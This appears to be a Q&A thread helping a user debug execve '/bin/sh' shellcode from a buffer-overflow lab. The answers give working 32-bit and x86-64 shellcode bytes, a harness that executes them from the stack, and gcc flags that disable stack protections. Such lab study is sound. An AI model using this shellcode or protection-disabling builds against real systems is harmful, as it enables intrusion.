1

I'm trying to run this shellcode but I keep getting segmentation fault 

/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
const char code[] =
   "\x31\xc0" /* Line 1: xorl %eax,%eax */
   "\x50" /* Line 2: pushl %eax */
   "\x68""//sh" /* Line 3: pushl $0x68732f2f */
   "\x68""/bin" /* Line 4: pushl $0x6e69622f */
   "\x89\xe3" /* Line 5: movl %esp,%ebx */
   "\x50" /* Line 6: pushl %eax */
   "\x53" /* Line 7: pushl %ebx */
   "\x89\xe1" /* Line 8: movl %esp,%ecx */
   "\x99" /* Line 9: cdq */
   "\xb0\x0b" /* Line 10: movb $0x0b,%al */
   "\xcd\x80" /* Line 11: int $0x80 */
   ;
int main(int argc, char **argv)
{
   char buf[sizeof(code)];
   strcpy(buf, code);
   ((void(*)( ))buf)( );
}

I compile it using:

 gcc -z execstack -o call_shellcode call_shellcode.c

and

 gcc -fno-stack-protector -z execstack -o call_shellcode call_shellcode.c

But I keep getting segmentation fault

Also, I'm running a 64 bit Linux system (ubuntu)

Improve this question
1
  • On x86-64 to exec a syscall the instruction is "syscall", not "int 0x80". Commented Nov 8, 2017 at 9:29

3 Answers 3

Reset to default
2

You are using a 32 bit assembly code on a x86-64 system. So, It is your problem, you have to create your shellcode for x86-64 systems.

E.g.

  400078:   48 31 c0                xor    rax,rax
  40007b:   48 bf 2f 2f 62 69 6e    movabs rdi,0x68732f6e69622f2f
  400082:   2f 73 68 
  400085:   48 31 f6                xor    rsi,rsi
  400088:   56                      push   rsi
  400089:   57                      push   rdi
  40008a:   48 89 e7                mov    rdi,rsp
  40008d:   48 31 d2                xor    rdx,rdx
  400090:   b0 3b                   mov    al,0x3b
  400092:   0f 05                   syscall

One of the main differences with 32 bits assembly, is how to use the syscalls. In this link Linux Syscalls x86-64 you can see what registers you need to call the sys_execve

int execve(const char *filename, char *const argv[], char *const envp[]);

  • const char *filename -> rdi
  • char *const argv[] -> rsi
  • char *const envp[] -> rdx

E.g.

  #include <stdlib.h>
  #include <stdio.h>
  #include <string.h>

  const char code[] = "\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
  int main(int argc, char **argv)
  {
       char buf[sizeof(code)];
       strcpy(buf, code);
       ((void(*)( ))buf)( );
  }

Compilation and test it.

$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
$ ./shellcode 
$ uname -a
 Linux foobar 4.4.0-97-generic #120-Ubuntu SMP Tue Sep 19 17:28:18 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

1

code doesn't have a trailing null byte, so you can't use strcpy() to copy it. Use memcpy().

memcpy(buf, code, sizeof(code));

As mentioned in a comment, the shellcode you have is for 32-bit Linux, but you're trying to run it on a 64-bit system. That probably explains the error after fixing this.

Improve this answer

7 Comments

still getting segmentation fault
I used gdb and got 0x00007fffffffe1d8 in ?? ()
Do a stack trace to see which line in your program it is.
I keep getting ?? ()
@KevinJones You got segmentation fault because it is a 32 bits shellcode.
|
0

You forget the -m32 flag for compiling a 32-bit binary on a 64-bit system. It looks like this is what you need:

gcc -m32 -z execstack -o call_shellcode call_shellcode.c

In order to be able to compile 32-bit binaries on a 64-bit system you need the 32-bit libraries available. On Ubuntu based systems you can install them via:

sudo apt-get install gcc-multilib

See: https://www.homeworkforyou.com/static_media/uploadedfiles/bufoverflow.pdf

Improve this answer

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.